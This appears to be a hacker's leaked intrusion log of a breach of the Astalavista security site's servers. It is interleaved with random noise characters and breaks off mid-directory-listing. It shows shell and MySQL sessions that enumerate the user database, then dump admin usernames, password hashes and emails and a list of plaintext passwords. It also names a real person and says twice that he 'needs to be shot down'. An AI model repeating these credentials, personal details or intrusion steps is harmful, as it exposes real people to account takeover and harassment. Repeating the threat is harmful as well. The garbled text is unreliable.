<language>en-us</language>3 j% m t! d* d: D
<lastBuildDate>’ . date(’F, j M Y H:i:s O’) . ‘</lastBuildDate>0 h* n- D0 N" M
<docs>http://blogs.law.harvard.edu/tech/rss</docs>$ d J! l# C" [3 v) E
<generator>Astalavista.com</generator>. c G5 H2 W8 w! T
<webMaster>info@astalavista.com</webMaster>’ . $items . ‘7 m9 P O) L' t
</channel>
u( N# y- G2 q- _4 B</rss>’;
% l$ i0 F5 w* C% j* K2 o
/ t. q, r' H4 I, u, ?0 b- ` if (file_exists(FULLPATH . ‘/feed/exploits.xml’)) {! w7 f; [1 Q; R/ E7 ? F5 O+ Q
unlink (FULLPATH . ‘/feed/exploits.xml’);
( ~3 E9 c- {3 O }
2 C+ S& l' a, R9 Y; d, E9 Q8 u0 A$ K% j2 a
file_put_contents(FULLPATH . ‘/feed/exploits.xml’, $xml);( M9 J( T0 e1 l. \8 E2 h/ A
[snip]
X$ I' Y) z0 W d& f2 m
) n" e! Y/ [3 lsh-3.2$ cat exploits.sh
( n' }1 p0 W+ ^1 U/ u- F#!/bin/sh
# q! Z6 `% D' `; w2 c3 [6 g
9 X+ [" a1 M( Y4 K: e; B5 O###########################################################2 v7 ^) m8 p( g$ l% b
# #3 F; z& h4 ]4 ~# }! T
# Title: milw0rm exploits adder #
' q5 ^% ^& z) [ \ F9 `# Description: Add all milw0rm exploits to the #1 Q: h: G: g- g1 S& p$ [
# Astalavista.com database #) w; G, e! o" o" U9 b4 A4 x# L0 d1 p
# #: a& @1 N/ t- o1 J
# Company: Astalavista Group #! R6 v% n4 n x7 R- c
# Author: Paulo M. Santos #% C/ I+ I+ w* u: M9 D
# E-Mail: 链接标记paulo.santos@astalavista.ch ## C) n1 g& }. P& m
# #
& f9 L; R- A: S5 q j# R+ B###########################################################
) {3 g) C' O" U4 q7 m4 @/ o7 o, f
4 p/ h7 b8 Q; z" I* n# path3 V. ] G7 Y9 A5 E) Q* t& w$ n
this_path=/home/com/public_html/modifications/cronjobs" f4 u- W( M* K1 G7 p0 e: @
@. G$ M2 i r9 B0 x$ K/ u
# change directory
. s- P0 R j1 Q& b v4 V5 u4 M9 Q6 acd $this_path
2 g0 d1 B2 ~4 C5 y& r2 o/ t3 kcd tmp/
$ L/ R; k, n# h0 I
X/ d# |9 B; U4 ~# delete files
5 O3 M9 `; w; |: F8 [- b1 grm -rf milw0rm.tar.* &* w, C& W2 l" t% _, l
rm -rf milw0rm/ &
5 l" Q. A( e. E% q8 Q, h" Y+ {9 v# G( d, f/ v. i$ E" R
# wget milw0rm paket) ?5 `; Z3 e# p4 Q
wget 链接标记[url]http://www.milw0rm.com/sploits/milw0rm.tar.bz2[/url]
4 I' R7 V# N# e! W
- s7 \- x; L' }+ A, P# extract milw0rm paket- K. I9 |! ]2 G6 [6 F# K* F
tar -xvf milw0rm.tar.bz2; t' C/ d% p, ~# o! _, @
. ^* ~5 E9 f M4 K; F- k5 @' F, X
# change owner
9 R1 U5 P' I7 \ L8 ychown -R com .
8 X2 h+ j" y; _# xchgrp -R com .
+ Q6 ^! v3 C, @" G; n4 q4 A M* o$ N+ C0 y
# execute php script5 C2 k; @7 z2 B8 T5 \8 V
cd $this_path; b0 \8 a$ P2 ?5 K5 ~
php -q exploits.php
2 G. n5 V5 e6 E2 ~3 T
6 s) k- X0 k: [* M* f# delete files
( `) {; ?3 Z' R8 ^, frm -rf tmp/milw0rm.tar.*4 n$ r) O2 R6 m( w# Y& |
rm -rf tmp/milw0rm/+ r7 y- i( ]9 H1 ^/ A
. a& H. e/ V; Zsh-3.2$ echo “Paulo M. Santos needs to be shot down.”1 g# n2 j3 L8 p! o& R- I
Paulo M. Santos needs to be shot down.
3 B0 q8 z; H) V& J. }: {1 D6 T' G# F3 J& x! K
mysql -u contrexxuser2 -p
: j3 U+ ?, I. lEnter password:
3 b2 ^3 j% m7 f: T5 @Welcome to the MySQL monitor. Commands end with ; or \g.+ D/ X$ j9 [2 A. f6 Y
Your MySQL connection id is 261694( g9 s' s1 Q3 X* R P; c! j
Server version: 5.0.45-community-log MySQL Community Edition (GPL)
! M: G: F& M* f
* ~, {7 A7 |* P1 S, V, D7 L$ YType ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
- e& d1 p9 @! I/ P# t ?" D
. B& e) t2 s9 w# o2 H$ Bmysql> show databases;
$ D4 q4 y2 C; B6 g T' ]5 Y) [+——————–+. J3 ~" ` Z0 U2 D8 b2 a
| Database |
+ I3 a3 Y, s0 V5 J+——————–+
: Z. U' j( X! w# ?| information_schema |& Y, l" Y+ ~5 d' n/ }& ?2 Y q
| com_contrexx2 |% T. L B% n2 y* e. C6 s* P
| com_contrexx2_live |
4 B4 d7 U" L- X# h1 @" o0 ]8 g% r| test |0 }8 v( c/ Z! ^$ y* l
+——————–+
8 H6 _# a) K4 e* }8 }' h0 D# A4 rows in set (0.00 sec)" Y, X& T ?0 p
, d, U( h& j- Jmysql> use com_contrexx2_live
& ]- r* C2 P/ A( D \" z9 r8 qDatabase changed
' q, i- s+ N5 k9 p$ U7 _6 ?: N" e( Vmysql> show tables;6 s; A' B: x0 v4 ]/ v4 \3 N
+————————————————–+/ W! {- |9 T: P
| Tables_in_com_contrexx2_live | E$ |( ]& A( n. `
+————————————————–+0 R, [; k7 R" h; G4 ~
| cc_banner_counter |8 G8 I1 U+ _- y: {8 z( O
| cc_search_counter |9 j5 g# |" S6 x! b
| contrexx_access_group_dynamic_ids |+ Z: M G9 p6 \- M6 q m' \; Z
| contrexx_access_group_static_ids |
, r: D4 O' }8 ?7 i+ v) I| contrexx_access_rel_user_group |: x; z; Z, a* E
| contrexx_access_settings |. `! h& O& d+ W; n$ f0 U
| contrexx_access_user_attribute |
; Y1 a0 o3 y$ G* i9 t| contrexx_access_user_attribute_name |! O0 K5 Z' [; v& J1 B$ n1 M8 [
| contrexx_access_user_attribute_value |7 D2 E7 W: f0 Y2 c0 [0 w7 T: u" h
| contrexx_access_user_core_attribute |
$ u5 O+ o! I4 ^# ?1 b8 ^| contrexx_access_user_groups |/ X( S. w/ I( a0 r$ {# f
| contrexx_access_user_mail |
6 C9 [4 f ]" D: i( D% v( q| contrexx_access_user_profile |
d8 J/ f1 t. P: R' V3 ?, B! G| contrexx_access_user_title |
% R& F; V9 k; Q4 L1 l* }| contrexx_access_user_validity |
# z4 u! [/ L2 K5 v8 v$ G& y7 L| contrexx_access_users |
% B- C0 V% E8 _# J, h| contrexx_backend_areas |
: y- \2 C* k0 d/ }( |4 n Y| contrexx_backups |
" [: H5 P j0 k| contrexx_content |
$ p1 u' }5 a# A0 Z# W5 e| contrexx_content_history |
8 r$ g( l' y3 S9 n: d$ |2 y| contrexx_content_logfile |) Y$ m5 Z9 y5 O: y& q" ]% C+ o
| contrexx_content_navigation |
2 [6 m; t. s; c: n! ~| contrexx_content_navigation_history |/ i1 ^+ a0 q8 N* R& C9 I' N1 d
| contrexx_ids |
! E1 y0 F4 H% U' O( g| contrexx_languages |
% x8 ?. e* t* y/ X2 W| contrexx_lib_country |
9 j* }) [- m' z# H| contrexx_log |, o% \+ [2 H9 q
| contrexx_module_alias_source |+ @6 M6 n- Y d2 F7 q
| contrexx_module_alias_target |
4 _' A1 ]; K! D5 D$ ]! {6 || contrexx_module_block_blocks |; `, S3 b2 K# A7 B" {% B- R# }; s
| contrexx_module_block_rel_lang |8 r/ n: n" E' P
| contrexx_module_block_rel_pages |
1 ^! Y7 n( u1 D7 w+ N' e4 _| contrexx_module_block_settings |
' ^1 C, Z; U) P: h7 x7 T| contrexx_module_blog_categories |
5 {! }& |( Y2 M$ P" d- i| contrexx_module_blog_comments |) m7 j: }! j1 v6 i' I6 N3 u' l
| contrexx_module_blog_message_to_category |( T( o( `: o+ T& p$ f: D
| contrexx_module_blog_messages |
- {$ ?& Q: e" I1 x- T( B. x| contrexx_module_blog_messages_lang |
- f1 w& p4 ?( `. M| contrexx_module_blog_networks |3 G1 ?; \; g+ b v1 Q
| contrexx_module_blog_networks_lang |
& {4 A" H$ t) y: {7 L| contrexx_module_blog_settings |% x1 B2 t. A, E5 G( r, r+ E% f. j1 l
| contrexx_module_blog_votes |
3 x" N* n& D T( P! X+ K" y) @2 V| contrexx_module_calendar |2 F& ^+ {: |' u0 ?/ t
| contrexx_module_calendar_access |
! M: c2 \- g% t6 Q/ D T' z k| contrexx_module_calendar_categories |
7 p2 n8 v0 u( B- [" q3 e' J8 b$ \| contrexx_module_calendar_form_data |* M7 u' A; C( | n$ i4 b
| contrexx_module_calendar_form_fields |
6 Y0 p1 g% Y4 O7 V# l1 B5 w2 c| contrexx_module_calendar_registrations |
0 W6 Z( l& q. i: X. z4 K| contrexx_module_calendar_settings |( P8 V5 B. s3 m" U9 j
| contrexx_module_calendar_style |3 A( }! o3 D- G$ S4 {. X
| contrexx_module_contact_form |4 E8 t1 Z4 d' l0 W& `5 Y
| contrexx_module_contact_form_data |# d7 U8 n+ c( k# S& @" o' H
| contrexx_module_contact_form_field |4 N" ^3 ]2 W& [$ Y
| contrexx_module_contact_settings |
' n s6 m' [7 _- l0 S5 z. F| contrexx_module_data_categories |9 l: k6 I' j0 l) b. c" F+ ]
| contrexx_module_data_message_to_category |
% R9 y, {0 k8 N$ A! o5 O9 }| contrexx_module_data_messages |3 {" h* r8 N1 F4 V" D* d# D
| contrexx_module_data_messages_lang |* S/ v N' Q! F& H N8 U1 N
| contrexx_module_data_placeholders |
' _1 |. w ^* p; Q! ^" u| contrexx_module_data_settings |
- ]; K- j8 q4 c/ U; b8 @8 d3 z| contrexx_module_directory_access |
4 ? q7 V$ C4 x `7 ?) M| contrexx_module_directory_categories |6 r! `) Z' R, x7 @, L; M4 m
| contrexx_module_directory_dir |
9 i- v9 z( d* P6 t| contrexx_module_directory_inputfields | R6 t# _& O5 _+ A1 c* | m
| contrexx_module_directory_levels |
) F- G" J" N% b2 n| contrexx_module_directory_mail |( ?+ P6 X; ]$ T" g9 R# G
| contrexx_module_directory_rel_dir_cat |( S2 ]% D0 b& u( ~! M
| contrexx_module_directory_rel_dir_level |# a2 v$ Z7 ?/ @4 Y5 G6 i5 `& Y
| contrexx_module_directory_settings |' l4 m7 ?0 ]! v/ g
| contrexx_module_directory_settings_google |
. `; ]2 I8 N$ h" g! x H( {$ c| contrexx_module_directory_vote |
) m7 u K8 z* y% x2 S| contrexx_module_docsys |
- @9 v) @% `7 i: _) p6 w0 E3 F| contrexx_module_docsys_categories |
- Q4 K( A( \3 V4 }; W| contrexx_module_egov_configuration |
. @% h3 A3 T/ l" P* r! q# ~| contrexx_module_egov_orders |2 { Y* [: W$ P5 W9 `7 |* Q) N& P
| contrexx_module_egov_product_calendar |0 q, I0 D8 N; X2 C5 ^' p
| contrexx_module_egov_product_fields |+ F6 v+ M/ p! D4 L/ K! x' i" g1 Z% Z
| contrexx_module_egov_products |" J) |" o* R, e9 e1 m: @& M( w
| contrexx_module_egov_settings |9 s$ g5 d' |, v# M: |
| contrexx_module_exploits |) L8 q2 I4 A, u6 @1 D: U
| contrexx_module_exploits_categories |
& P: x0 X0 w1 I6 V" S+ z$ X0 _| contrexx_module_feed_category |
: F" g$ ?0 S# u| contrexx_module_feed_news |
9 L1 h D, {& v! ~( K& G; R2 k; U| contrexx_module_feed_newsml_association |2 q W. @ s5 t- P) f, g Y( J1 ]- O
| contrexx_module_feed_newsml_categories |
; Y9 z8 x3 U3 t, @ M1 p% Z| contrexx_module_feed_newsml_documents |
5 r! T" A: k: D, ~5 S! z- U: [( E2 g! Q| contrexx_module_feed_newsml_providers |
) [5 x# l/ u1 S. g$ I/ V- ?| contrexx_module_forum_access |# S3 C4 b: R: \" Q" `) ]7 v1 Q% M4 b5 d
| contrexx_module_forum_categories |
1 Z$ @' }9 _0 p' s3 C| contrexx_module_forum_categories_lang |
3 n& a ~: B7 ]( G/ B9 F3 P. k| contrexx_module_forum_notification |
" P2 v, T( Q7 H| contrexx_module_forum_postings |
. m+ a' U+ D; _; J$ I5 @# ^' A| contrexx_module_forum_rating |2 ?6 L4 ]" K2 j) ~. P: I
| contrexx_module_forum_settings |. o, u. c+ [! I
| contrexx_module_forum_statistics |
- p5 P2 n6 f# \! G* n: N& s4 Z| contrexx_module_gallery_categories |7 K+ p" C, u1 Q& a: C( w4 z; a
| contrexx_module_gallery_comments |
, W: z% r& d+ w0 S+ i8 x: T| contrexx_module_gallery_language |
2 K3 z% R; C4 j# Y2 X+ p0 p, e| contrexx_module_gallery_language_pics |0 _, k% g, q4 g, Q3 E C- x$ c
| contrexx_module_gallery_pictures |. A$ L; {1 o$ t/ j: ^/ `9 _
| contrexx_module_gallery_settings |$ M+ w x6 {, ~1 H' ~5 R
| contrexx_module_gallery_votes |) }8 J) y Y( u
| contrexx_module_guestbook |: q8 {- o2 u, ?/ @
| contrexx_module_guestbook_settings |5 \7 S& E: ~3 t' d
| contrexx_module_livecam |0 I% \& }8 y( L9 K" T- F
| contrexx_module_livecam_settings |
7 R N, K- ^' U" ^! j7 s6 Z* E| contrexx_module_market |
$ ]# ^7 c, h* I' d) Y( s2 r. u4 ]| contrexx_module_market_access |
3 M+ D: W. ]6 H* b J. f$ X* l$ J5 V| contrexx_module_market_categories |
. g, [& j! G/ k7 u| contrexx_module_market_mail |
* ~( ^" R' w# [5 l% L- }| contrexx_module_market_paypal |
! E7 `' J( s i: t/ b: Y| contrexx_module_market_settings |; E, H! z. k' E6 _4 [2 r
| contrexx_module_market_spez_fields |
1 @; X4 i: e! {) @( e3 d| contrexx_module_mediadir_access |
+ F9 F8 j! I$ h9 |4 D$ o7 ~; e6 h1 _# p7 l| contrexx_module_mediadir_categories |9 e! e4 B1 P# E$ a' ]& n( ^' B
| contrexx_module_mediadir_comments |
- L: F6 }* e* i, r8 `| contrexx_module_mediadir_dir |
0 Y5 r7 e: S3 w% F# L7 \$ Y7 ]| contrexx_module_mediadir_inputfields |
, U" ^ Y& T7 X6 H' j| contrexx_module_mediadir_levels |
' d6 w1 O; D( y9 G1 E2 {| contrexx_module_mediadir_mail |
8 N+ ]- G8 g. Q1 I- [| contrexx_module_mediadir_rel_dir_cat |
% d7 o: f% e' ?| contrexx_module_mediadir_rel_dir_level |
4 G1 g4 Z* Q u( A& v0 P9 r| contrexx_module_mediadir_reports |
' N! i' u1 w$ S5 t& i! u/ }| contrexx_module_mediadir_settings |/ s. B1 ^2 D# r6 k
| contrexx_module_mediadir_settings_google |3 }" V3 n0 ]* B7 p! V% t8 R9 _
| contrexx_module_mediadir_vote |
9 S8 D! n! W, ^- ?$ Z| contrexx_module_memberdir_directories |
. ^6 A: D" `+ ?% Q% h/ ^! C| contrexx_module_memberdir_name |# n: d* O D, k2 p b
| contrexx_module_memberdir_settings |
# d" r0 J! W# k4 v9 X/ n| contrexx_module_memberdir_values |
3 x3 F3 J3 o8 k! ?9 e( a| contrexx_module_nettools_allowed_groups |. Y& `" U$ ~3 [. `3 w
| contrexx_module_nettools_settings |
& Z0 d* l1 G: q| contrexx_module_news |) T5 @ ~: A+ W+ |$ w- ]
| contrexx_module_news_access |+ l* p: H: M F2 j- P& I
| contrexx_module_news_categories |
2 A1 p, f; q; c' q M| contrexx_module_news_settings |6 e+ n9 [, l' i Z- C& N4 w# r
| contrexx_module_news_teaser_frame |
1 ]9 n* F, o+ w1 K| contrexx_module_news_teaser_frame_templates |
" D2 \" Z! s7 l% i| contrexx_module_news_ticker |- l8 v5 I; E' C& \
| contrexx_module_newsletter |* e [& o: s$ U$ W8 S6 e" w
| contrexx_module_newsletter_attachment |( B t4 G Y( G! y3 @+ j
| contrexx_module_newsletter_category |
3 y) z2 t: o {: e- a( E| contrexx_module_newsletter_confirm_mail |
7 h+ @8 @ u) d. ~ [: \% G( @| contrexx_module_newsletter_rel_cat_news |
" n5 b6 z7 U6 V7 J- w7 w8 c| contrexx_module_newsletter_rel_user_cat |, X( Y, d. x6 f0 V& m; Q
| contrexx_module_newsletter_settings |: {+ k" E: F' S. L
| contrexx_module_newsletter_template |
! U5 Y4 L v8 @$ [! f* x e| contrexx_module_newsletter_tmp_sending |8 K& _! I5 j* p. H3 ~
| contrexx_module_newsletter_user |
# s. N$ M+ F1 U: W, d. J# X| contrexx_module_newsletter_user_title |
v9 F# {$ Q/ Y- x) {- C C9 ~| contrexx_module_onlinetools_defaultports |- D- ~* N. [* ^( [- p3 u
| contrexx_module_onlinetools_defaultports_back |
M; U) C# s0 W: F| contrexx_module_onlinetools_geolitecity_blocks |" g" y# n( d2 w& W/ y) b
| contrexx_module_onlinetools_geolitecity_country |
" I2 D/ ]) w- W6 n" O| contrexx_module_onlinetools_geolitecity_location |
( E: q( }9 E0 o& U7 A. R! g9 i0 A| contrexx_module_podcast_category |
. d) D5 P$ j1 _2 P9 R0 `| contrexx_module_podcast_medium |
9 m' l" O$ u! a; o( i4 Q| contrexx_module_podcast_rel_category_lang |; K' y% W: W1 G, ?
| contrexx_module_podcast_rel_medium_category |6 r& G: b% T4 `, E
| contrexx_module_podcast_settings |
* v' z \4 z9 s6 N| contrexx_module_podcast_template |
- p& A8 C5 D7 K( d5 D6 H) M| contrexx_module_proxydb |4 ?$ p2 T: j$ J" l# k; j6 a1 a. T
| contrexx_module_recommend |
( ^! q2 @, Q* A# J| contrexx_module_repository |
+ ^! Y& P0 z* Z' L1 J q0 \* L1 v, y| contrexx_module_securitynews_cats |
2 r; b; u5 M* q# [8 d| contrexx_module_securitynews_feeds |! a, P1 }+ g$ T
| contrexx_module_securitynews_news |4 F/ o8 L1 `8 u, I' J4 w
| contrexx_module_shop_categories |
4 }/ Q+ Y: P! {| contrexx_module_shop_config |& y! s% w3 k. O3 ^* ]2 d
| contrexx_module_shop_countries |" |" o% b) A" ^% r
| contrexx_module_shop_currencies |
+ |& T. d6 z4 b| contrexx_module_shop_customers |! R9 S3 T. Z$ S1 b' ~' Q
| contrexx_module_shop_importimg |3 [0 A2 `. z2 A1 G9 Y9 X% b
| contrexx_module_shop_lsv |
" k N* D4 A% ?| contrexx_module_shop_mail |; ~6 j: B2 S/ ]
| contrexx_module_shop_mail_content |
" @" V" o7 u6 S/ ?4 r0 U9 Z| contrexx_module_shop_manufacturer |& c9 F7 k0 m4 ~: }0 B3 z
| contrexx_module_shop_order_items |
4 F0 q& N9 Y5 z* u; U5 p| contrexx_module_shop_order_items_attributes |
; i' W, R2 G1 k6 o" `, T% w| contrexx_module_shop_orders |
0 q7 n0 u) t' w9 E) [| contrexx_module_shop_payment |
- V" L% x( n% j| contrexx_module_shop_payment_processors |
( }5 C) c. B! |: a| contrexx_module_shop_pricelists |
1 V4 z7 ~9 @" y$ c+ m5 w| contrexx_module_shop_products |: z! s! n9 E# s: s
| contrexx_module_shop_products_attributes |
J( y2 e8 S% m+ f| contrexx_module_shop_products_attributes_name |
& g- q% ]5 R6 Q. v4 ^: v$ p| contrexx_module_shop_products_attributes_value |7 P8 R2 Q; U. P! q) ~3 ]
| contrexx_module_shop_products_downloads |
7 f7 v8 r5 G/ p' ?/ w| contrexx_module_shop_rel_countries |. ]- o, r0 x; @0 z7 T
| contrexx_module_shop_rel_payment |1 f. P6 h* S4 ^" G! s
| contrexx_module_shop_rel_shipment |, L7 K0 e* o7 y
| contrexx_module_shop_shipment_cost |
F. u5 r: F- M| contrexx_module_shop_shipper |2 g' p3 e9 n- @& A
| contrexx_module_shop_vat |' m/ c$ l( b; s/ n e
| contrexx_module_shop_zones |: a/ S, o, Q, u! W: J0 D1 C
| contrexx_module_u2u_address_list |
8 T* D9 _5 F1 ?8 j% c4 C/ i9 B) || contrexx_module_u2u_message_log |
' B& x/ f% L6 X) ] u0 E( o| contrexx_module_u2u_sent_messages |
& @: z5 x4 x* Q1 l; g$ X Y' S' g% A| contrexx_module_u2u_settings |$ J \& E6 C d% E( F
| contrexx_module_u2u_user_log |
) V4 V+ a' I' z| contrexx_modules |
+ }6 V4 W% F2 U1 _; S: c| contrexx_sessions |7 ?0 c7 w* U, P: g
| contrexx_settings |
4 H1 Q" Q5 M, O| contrexx_settings_smtp |4 ^7 N& U- e+ T5 f9 c j
| contrexx_skins |- G# ^9 g$ X0 n% m4 S
| contrexx_stats_browser |! j! h9 `- Z. I& Q
| contrexx_stats_colourdepth |. Q; w" u* H6 O
| contrexx_stats_config |
) m; J: n& F9 M3 P* H1 F( p| contrexx_stats_country |
, }: ^9 L: l5 X, n6 H% W# K6 |+ W| contrexx_stats_hostname |# K. j! e* S% f- g
| contrexx_stats_javascript |
8 f8 V4 {& D, f' i" [5 l2 ^( X% n| contrexx_stats_operatingsystem |& P9 \) R* S$ D1 H# Q5 x* b
| contrexx_stats_referer |
! F5 q. D) Y' e: L/ c e/ |% || contrexx_stats_requests |+ `' j8 n3 C& z7 k$ c
| contrexx_stats_requests_summary |( l* |; }/ q, H& U% O, Y& Z
| contrexx_stats_screenresolution |
5 W/ M+ a4 a$ C' Y3 f n- E L% C9 C| contrexx_stats_search |( P# B* p0 j# `7 i/ s: u X% C
| contrexx_stats_spiders |! j' y7 A% i1 J1 b$ \
| contrexx_stats_spiders_summary |
; l# ?6 ~% {( N; q9 h| contrexx_stats_visitors |
9 J( w; f; `8 R; L7 y| contrexx_stats_visitors_summary |4 F' ]( L) Z* M% M4 h' J; x
| contrexx_voting_additionaldata | _5 @8 J$ K% m9 ~4 A' I. X( a' Q
| contrexx_voting_email |+ x5 z( D, i: \6 v4 z. x3 l
| contrexx_voting_rel_email_system |
! Z/ Y+ Y1 o1 K5 x `5 q! _| contrexx_voting_results |
$ H1 X. |8 g+ F0 D9 Y" `2 \| contrexx_voting_system |
$ d& M. x `3 K$ x" K| foo |
# n: H$ ?, q# r+————————————————–+
( I+ ]4 F; K; L0 }227 rows in set (0.01 sec); S. ~& a# d/ ^: @- _- W% z
2 p& g+ l, g0 v8 ^6 A
mysql> select count(*) as skids from contrexx_access_users;2 k$ o+ O0 N6 k) T) |4 i( Y8 m
+——-+ J. _; O1 ?! X, @' j
| skids |
2 `+ A6 Q6 S$ [0 N7 ^0 M+ ^/ T+ b7 i+——-+
1 {' b3 `4 H1 Q| 53699 |
; |" c# D$ [% J/ E/ K+——-+
: i5 J5 c. T; U3 [3 M) u2 O1 row in set (0.00 sec); R/ l2 q T6 Z% B4 r3 J/ L. D$ {
7 _4 X/ }, p% F3 g- w$ }% }7 }5 Y
mysql> describe contrexx_access_users;
X* C0 R- w' k% I+ D+——————+——————————————+——+—–+————–+—————-+
" x' t& k/ }1 ]3 h| Field | Type | Null | Key | Default | Extra |2 }8 \# j8 B3 L" {$ e* p) G* v' K, R* B
+——————+——————————————+——+—–+————–+—————-+
- n- }, p( _2 n" m; L| id | int(10) unsigned | NO | PRI | NULL | auto_increment |/ x2 U# G& _% E7 ?$ e
| is_admin | tinyint(1) unsigned | NO | | 0 | |
6 T' I2 P# H. d2 g% S| username | varchar(40) | YES | MUL | NULL | |: i& k7 R, o9 Q; N: J; v2 ]! @ C
| password | varchar(32) | YES | | NULL | |
: J7 I. J1 N8 Q5 J1 m3 H: o| regdate | int(14) unsigned | NO | | 0 | |+ D+ Z C# `$ i- E0 [+ i Y
| expiration | int(14) unsigned | NO | | 0 | |
4 o. Y- c* L( n) \) n| validity | int(10) unsigned | NO | | 0 | |9 J9 x4 X. m$ R( Z7 K3 p3 D
| last_auth | int(14) unsigned | NO | | 0 | |2 W/ W' D4 q1 m
| last_activity | int(14) unsigned | NO | | 0 | |
5 g# t/ Y* B; g6 J4 J1 d| email | varchar(255) | YES | | NULL | |
# F$ B. [1 P# f1 [+ C$ i: `| email_access | enum(’everyone’,'members_only’,'nobody’) | NO | | nobody | |
2 ?9 d( |' X& x1 Q& u# S| frontend_lang_id | int(2) unsigned | NO | | 0 | |
/ I: ^" X, S# F& t! F" k+ ^| backend_lang_id | int(2) unsigned | NO | | 0 | |
2 p$ I, M R$ r# }" \: Q* K| active | tinyint(1) | NO | | 0 | |8 `# r" m" {9 g5 [
| profile_access | enum(’everyone’,'members_only’,'nobody’) | NO | | members_only | |) }" V# q4 @* \, j1 a$ O" W# }
| restore_key | varchar(32) | NO | | | |
/ q) r' d8 i3 ?| restore_key_time | int(14) unsigned | NO | | 0 | |5 q6 B( R$ x! P- x$ a; z4 Z
| u2u_active | enum(’0′,’1′) | NO | | 1 | |
9 O8 ]- G. h$ m. _+——————+——————————————+——+—–+————–+—————-+$ k( u' g1 M/ x3 h2 m
18 rows in set (0.00 sec)& K7 f9 G/ D3 d
+ r( N! u w: b) M# |6 y6 `0 H: q3 B% qmysql> select username,password,email from contrexx_access_users where is_admin = 1;
. J4 c2 D0 f0 w5 i: C# A+————+———————————-+—————————–+
% } W/ a% d3 S| username | password | email |0 S6 R# ]8 [5 J# n- r
+————+———————————-+—————————–+
- O3 ~+ @8 g5 G: P| system | 0defe9e458e745625fffbc215d7801c5 | 链接标记info@comvation.com |
' J% z1 q0 g0 w8 M& N| prozac | 1f65f06d9758599e9ad27cf9707f92b5 | 链接标记prozac@astalavista.com |+ @1 V9 x* |, C P, P& f0 Y/ N
| Be1er0ph0r | 78d164dc7f57cc142f07b1b4629b958a | 链接标记paulo.santos@astalavista.ch |, }: |8 g {, m, G
| schmid | 0defe9e458e745625fffbc215d7801c5 | 链接标记ivan.schmid@comvation.com |2 d) h! [5 u' C8 L
+————+———————————-+—————————–+
0 c& Q8 x, f0 f# ^( P4 rows in set (0.04 sec)2 ~8 Q: b. Y: g* A( k* @
- ^, ]/ F: E9 H1 L- k4 V- O. X
mysql> exit; U) _4 Z3 L1 F
Bye4 }# c" E9 Y% M
# R4 w! X6 P$ V5 z, p0 }1 `* ~( a
[~] There you go, your “team of security and IT professionals” is a joke.
0 y& D' B+ a" V) j
4 a% x0 J8 H& c+——————————+
; X0 n& f0 `% e( R3 _3 _. Asystem:f82BN3+_*
( c7 u: k1 O. D0 b' o8 b* ~- B BBe1er0ph0r:belerophor4astacom
$ @- L" ~: W+ ] b0 S$ `7 c! iprozac:asta4cms!
: G: ?0 G2 R w) V% Fcommander:mpbdaagf6m
; k) b0 J5 p. a* D a4 D5 tsykadul:ak29eral
8 ?. ?, M8 s, u% R2 r: H: F+——————————+
; u4 k4 }) e% C& j: t; ~ J
9 ~% U# ^* A7 o[~] Paulo M. Santos AKA Be1er0ph0r needs to be shot down for his milw0rm ripping script(s)5 o+ ^1 u8 y. ~0 A
…and the others, find another area to get paid from, security isn’t for sale and you obviously fail at it.# K o2 Q2 S7 A, S/ } b
) d! @4 U6 w- W/ \
[~] Lets move to astalavista.net now,3 B) s0 P' p4 b& I9 j
% {( w6 o. k9 n3 H- [2 v9 V
From <链接标记[url]https://www.astalavista.net/[/url]>:
/ i0 W: O0 o% `2 a" v>> Everyone knows that the best defense is a good offense., t& s) f' \0 P
>> Those who wait for their foes to find a security loophole are opting for the wrong strategy. P3 J* N# W6 G' h8 f
>> The ASTALAVISTA hacking & security community is the largest IT security community in the world.+ l1 O# i6 I0 ]0 x9 h/ |
>> It.s a platform for both IT specialists and novices, and anyone interested in expanding and updating their knowledge regarding IT security and hacking.”- P% I* g: A( c' `, X0 d7 A, Y
% G F* k' i% Q' t
>> Go ahead, try and hack our server . in a completely legal way!( A! ]( c. D4 d. f; P% E# ]3 H6 F
>> Learn by doing: We offer our members tricky tasks and challenges on an7 b6 L. h0 l' p' U, J
>> ongoing basis so you can test your knowledge and abilities. You can also0 d, o- q" @8 ~# p+ e* M/ k, |
>> demonstrate what you.ve mastered by taking part in regular hacker contests7 Y4 T! }" A, X
>> and war games
, o( d4 D. Q3 ~
; n, J4 Z0 K# S, I3 h4 N1 \[~] Lets take a look there, after all… they are hack-proof, aren’t they?!
* }* `0 O/ h4 [: @8 ?+ \
6 \7 x# K, N6 \4 ][-] Tricky task: Find home dir of astalavista.net
; j+ ?- {4 K* \2 d L, T1 z
: p7 E$ h. ~. o' r$ q5 ?) P& V/ V2 ish-3.2$ ls -la ~astanet
7 u; s7 W3 k* b; M1 B9 L; Gtotal 48
; _) V* q7 I, a- Vdrwx–x–x 6 astanet astanet 4096 Dec 23 15:55 ., z' ^8 g- i0 a5 v$ k( V
drwxr-xr-x 14 root root 4096 Mar 11 17:56 .." R9 `# @; {" ~. b# [1 M
drwxr-xr-x 2 root root 4096 Dec 23 16:00 auth
* ], v5 k6 I) U9 p; l3 h-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history1 H2 j* t# [- {& o2 b# v# j
-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout
% P8 J. A% ?% ]; b" ]-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile
1 L) \& f5 U% x-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc2 J6 S a3 {& {1 ~) M8 Z( q) z" \
drwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains
# B h( K3 F& jdrwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap$ G3 G2 {$ o7 T. C5 Z& x
drwx—— 2 astanet astanet 4096 Dec 23 12:18 mail& z8 G7 b* D3 u5 Q+ \
lrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html2 Z/ n9 F" h3 A- y9 _" f
-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow
6 n0 `8 c4 z9 x- F: V2 D2 m! Q. V* Y+ p" n3 H1 t+ V8 D0 x6 j9 X
sh-3.2$ cd /home/astanet/domains/astalavista.net/private_html/
, e) [, n3 Q' \sh-3.2$ ls -la m& P7 Y7 z0 l/ P1 Y; N2 A1 g
total 200) Q; U$ d# i7 R5 c
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 .
